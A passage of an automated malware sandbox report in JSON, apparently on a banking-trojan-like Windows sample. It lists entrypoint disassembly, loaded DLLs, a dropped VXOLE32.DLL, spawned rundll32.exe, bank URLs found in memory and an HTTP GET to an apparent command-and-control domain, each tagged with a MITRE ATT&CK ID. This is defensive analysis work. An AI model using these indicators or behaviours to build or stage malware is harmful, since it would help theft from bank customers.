0xffffffff,or\tdword ptr [0x40e6b4], 0xffffffff,call\tdword ptr [0x40b214],mov\tecx, dword ptr [0x40e6a4],mov\tdword ptr [eax], ecx,call\tdword ptr [0x40b218],mov\tecx, dword ptr [0x40e6a0],mov\tdword ptr [eax], ecx,mov\teax, dword ptr [0x40b21c],\"\n \"notepad_.exe\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,push\t-1,push\t0x40b5d8,push\t0x40a4d6,mov\teax, dword ptr fs:[0],push\teax,mov\tdword ptr fs:[0], esp,sub\tesp, 0x68,push\tebx,push\tesi,push\tedi,mov\tdword ptr [ebp - 0x18], esp,xor\tebx, ebx,mov\tdword ptr [ebp - 4], ebx,push\t2,call\tdword ptr [0x40b210],pop\tecx,or\tdword ptr [0x40e6b0], 0xffffffff,or\tdword ptr [0x40e6b4], 0xffffffff,call\tdword ptr [0x40b214],mov\tecx, dword ptr [0x40e6a4],mov\tdword ptr [eax], ecx,call\tdword ptr [0x40b218],mov\tecx, dword ptr [0x40e6a0],mov\tdword ptr [eax], ecx,mov\teax, dword ptr [0x40b21c],\"\n \"_.exe\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,push\t-1,push\t0x40b5d8,push\t0x40a4d6,mov\teax, dword ptr fs:[0],push\teax,mov\tdword ptr fs:[0], esp,sub\tesp, 0x68,push\tebx,push\tesi,push\tedi,mov\tdword ptr [ebp - 0x18], esp,xor\tebx, ebx,mov\tdword ptr [ebp - 4], ebx,push\t2,call\tdword ptr [0x40b210],pop\tecx,or\tdword ptr [0x40e6b0], 0xffffffff,or\tdword ptr [0x40e6b4], 0xffffffff,call\tdword ptr [0x40b214],mov\tecx, dword ptr [0x40e6a4],mov\tdword ptr [eax], ecx,call\tdword ptr [0x40b218],mov\tecx, dword ptr [0x40e6a0],mov\tdword ptr [eax], ecx,mov\teax, dword ptr [0x40b21c],\"\n \"RUNDLL32.EXE.67A47D15.bin\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,push\t-1,push\t0x40b5d8,push\t0x40a4d6,mov\teax, dword ptr fs:[0],push\teax,mov\tdword ptr fs:[0], esp,sub\tesp, 0x68,push\tebx,push\tesi,push\tedi,mov\tdword ptr [ebp - 0x18], esp,xor\tebx, ebx,mov\tdword ptr [ebp - 4], ebx,push\t2,call\tdword ptr [0x40b210],pop\tecx,or\tdword ptr [0x40e6b0], 0xffffffff,or\tdword ptr [0x40e6b4], 0xffffffff,call\tdword ptr [0x40b214],mov\tecx, dword ptr [0x40e6a4],mov\tdword ptr [eax], ecx,call\tdword ptr [0x40b218],mov\tecx, dword ptr [0x40e6a0],mov\tdword ptr [eax], ecx,mov\teax, dword ptr [0x40b21c],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70820000\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" loaded module \"KERNEL32\" at base 77350000\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69e90000\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" loaded module \"KERNEL32.DLL\" at base 77350000\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74f90000\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" loaded module \"ADVAPI32.DLL\" at base 76c50000\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73e00000\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" loaded module \"DWMAPI.DLL\" at base 73950000\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" loaded module \"%WINDIR%\\SYSTEM32\\OLE32.DLL\" at base 75510000\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" loaded module \"CRYPTBASE.DLL\" at base 74fe0000\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" loaded module \"CLBCATQ.DLL\" at base 75d90000\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSCTF.DLL\" at base 75a80000\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" loaded module \"OLEAUT32.DLL\" at base 756d0000\n \"rundll32.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70820000\n \"rundll32.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"rundll32.exe\" loaded module \"KERNEL32\" at base 77350000\n \"rundll32.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"rundll32.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69e90000\n \"rundll32.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 6f6c0000\n \"rundll32.exe\" loaded module \"URLMON.DLL\" at base 76b00000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73e00000\n \"rundll32.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L2-1-0.DLL\" at base 71db0000\n \"rundll32.exe\" loaded module \"WS2_32.DLL\" at base 754d0000\n \"rundll32.exe\" loaded module \"WINHTTP.DLL\" at base 70d70000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 74ab0000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHIP6.DLL\" at base 74aa0000\n \"rundll32.exe\" loaded module \"SECUR32.DLL\" at base 74e20000\n \"rundll32.exe\" loaded module \"IPHLPAPI.DLL\" at base 73450000\n \"rundll32.exe\" loaded module \"OLEAUT32.DLL\" at base 756d0000\n \"rundll32.exe\" loaded module \"DNSAPI.DLL\" at base 74970000\n \"rundll32.exe\" loaded module \"RPCRT4.DLL\" at base 759c0000\n \"rundll32.exe\" loaded module \"CRYPTBASE.DLL\" at base 74fe0000\n \"rundll32.exe\" loaded module \"CLBCATQ.DLL\" at base 75d90000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NETPROFM.DLL\" at base 6ce40000\n \"rundll32.exe\" loaded module \"OLE32.DLL\" at base 75510000\n \"rundll32.exe\" loaded module \"DHCPCSVC6.DLL\" at base 73360000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74610000\n \"rundll32.exe\" loaded module \"RASADHLP.DLL\" at base 71780000\n \"rundll32.exe\" loaded module \"DHCPCSVC.DLL\" at base 732d0000\n \"rundll32.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 76ae0000\n \"rundll32.exe\" loaded module \"ADVAPI32.DLL\" at base 76c50000\n \"rundll32.exe\" loaded module \"CRYPTSP.DLL\" at base 74af0000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74880000\n \"rundll32.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 75080000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NPMPROXY.DLL\" at base 6c0a0000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 73380000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\OLEAUT32.DLL\" at base 756d0000\n \"rundll32.exe\" loaded module \"COMCTL32.DLL\" at base 73fe0000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WS2_32\" at base 754d0000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WININET.DLL\" at base 76d90000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"LoadLibrary\" with a parameter KERNEL32.DLL (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00005944)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004384)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004384)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004384)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004384)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00004384)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter urlmon.dll (UID: 00000000-00004384)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004384)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-shlwapi-l2-1-0.dll (UID: 00000000-00004384)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00004384)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter winhttp.dll (UID: 00000000-00004384)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00004384)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter IPHLPAPI.DLL (UID: 00000000-00004384)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00004384)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter DNSAPI.dll (UID: 00000000-00004384)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004384)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter dhcpcsvc.DLL (UID: 00000000-00004384)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00004384)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004384)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004384)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter Comctl32.dll (UID: 00000000-00004384)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ws2_32 (UID: 00000000-00004384)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"rundll32.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"rundll32.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759C0000\n \"rundll32.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759C0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"rundll32.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"rundll32.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"rundll32.exe\" (UID: 00000000-00004384)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"rundll32.exe\" (UID: 00000000-00004384)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8\" was detected as \"MFC\" and name: \"Library\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8\" was detected as \"Microsoft Visual C++\" and name: \"Compiler\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"notepad_.exe\" was detected as \"MFC\" and name: \"Library\"\n \"notepad_.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"notepad_.exe\" was detected as \"Microsoft Visual C++\" and name: \"Compiler\"\n \"notepad_.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"_.exe\" was detected as \"MFC\" and name: \"Library\"\n \"_.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"_.exe\" was detected as \"Microsoft Visual C++\" and name: \"Compiler\"\n \"_.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"RUNDLL32.EXE.67A47D15.bin\" was detected as \"MFC\" and name: \"Library\"\n \"RUNDLL32.EXE.67A47D15.bin\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"RUNDLL32.EXE.67A47D15.bin\" was detected as \"Microsoft Visual C++\" and name: \"Compiler\"\n \"RUNDLL32.EXE.67A47D15.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-2", "type": 9, "name": "An application crash occurred", "description": "Report process \"WerFault.exe\" was created by \"svchost.exe\"", "origin": "Monitored Target"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:80\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-2", "type": 7, "relevance": 5, "name": "GETs files from a webserver", "description": "\"GET /article.php?id=103822 HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\nHost: www.zigui.org\nConnection: Keep-Alive\" Response ==> HTTP/1.1 400 Bad Request\nContent-Type: text/html\nDate: Thu\n 06 Feb 2025 09:10:12 GMT\nConnection: close\nContent-Length: 39 with response body ==>3C68313E42616420526571756573742028496E76616C696420486F73746E616D65293C2F68313E.......", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-0", "type": 7, "relevance": 1, "name": "Contacts domains", "description": "\"www.zigui.org\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"www.zigui.org\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8\" has an writable section named \"\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8\" has an writable section named \".rsrc\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8\" has an writable section named \".PEC\"\n \"notepad_.exe\" has an writable section named \"\"\n \"notepad_.exe\" has an writable section named \".rsrc\"\n \"notepad_.exe\" has an writable section named \".PEC\"\n \"_.exe\" has an writable section named \"\"\n \"_.exe\" has an writable section named \".rsrc\"\n \"_.exe\" has an writable section named \".PEC\"\n \"RUNDLL32.EXE.67A47D15.bin\" has an writable section named \"\"\n \"RUNDLL32.EXE.67A47D15.bin\" has an writable section named \".rsrc\"\n \"RUNDLL32.EXE.67A47D15.bin\" has an writable section named \".PEC\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8\" has an executable section named \"\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8\" has an executable section named \".PEC\"\n \"notepad_.exe\" has an executable section named \"\"\n \"notepad_.exe\" has an executable section named \".PEC\"\n \"_.exe\" has an executable section named \"\"\n \"_.exe\" has an executable section named \".PEC\"\n \"RUNDLL32.EXE.67A47D15.bin\" has an executable section named \"\"\n \"RUNDLL32.EXE.67A47D15.bin\" has an executable section named \".PEC\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-23", "type": 2, "relevance": 2, "name": "Detected known bank URL artifact", "description": "\"www.credit-agricole.fr\" (Source: 00000000-00004384.00000001.67185.0031E000.00000004.mdmp, Indicator: \"credit-agricole.fr\")\n \"capitalone.com\" (Source: 00000000-00004384.00000001.67185.0031E000.00000004.mdmp, Indicator: \"capitalone.com\")", "origin": "File/Memory"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8\" was detected as \"Microsoft visual C++ 5.0\"\n \"notepad_.exe\" was detected as \"Microsoft visual C++ 5.0\"\n \"_.exe\" was detected as \"Microsoft visual C++ 5.0\"\n \"RUNDLL32.EXE.67A47D15.bin\" was detected as \"Microsoft visual C++ 5.0\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" trying to access non-existent file \"C:\\MFC42.DLL\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" trying to access non-existent file \"C:\\ODBC32.dll\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" trying to access non-existent file \"C:\\Windows\\system32\\MFC42LOC.DLL\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" trying to access non-existent file \"C:\\Windows\\system32\\MFC42LOC.DLL.DLL\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" trying to access non-existent file \"C:\\Windows\\IEXPLORE.EXE\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" trying to access non-existent file \"C:\\Windows\\IEXPLORE .EXE\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" trying to access non-existent file \"C:\\Windows\\internat.exe\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" trying to access non-existent file \"C:\\Windows\\rundll32.exe\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" trying to access non-existent file \"C:\\Windows\\system32\\IEXPLORE.EXE\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" trying to access non-existent file \"C:\\Windows\\system32\\IEXPLORE .EXE\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" trying to access non-existent file \"C:\\Windows\\system32\\mssysint.exe\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" trying to access non-existent file \"C:\\Windows\\system32\\mspsint.exe\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" trying to access non-existent file \"C:\\Windows\\system32\\mspbint.exe\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" trying to access non-existent file \"C:\\Windows\\system32\\mspbbase.dll\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" trying to access non-existent file \"C:\\Windows\\system32\\mspbhook.dll\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" trying to access non-existent file \"C:\\Windows\\system32\\psinthk.dll\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" trying to access non-existent file \"C:\\Windows\\system32\\psintbs.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" reads file \"c:\\3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" trying to touch file \"C:\\MFC42.DLL\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" trying to touch file \"C:\\Windows\\system32\\MFC42.DLL\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" trying to touch file \"C:\\ODBC32.dll\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" trying to touch file \"C:\\Windows\\system32\\ODBC32.dll\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" trying to touch file \"C:\\version.DLL\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" trying to touch file \"C:\\Windows\\system32\\odbcint.dll\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" trying to touch file \"C:\\Windows\\system32\\MFC42LOC.DLL\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" trying to touch file \"C:\\Windows\\system32\\MFC42LOC.DLL.DLL\"\n 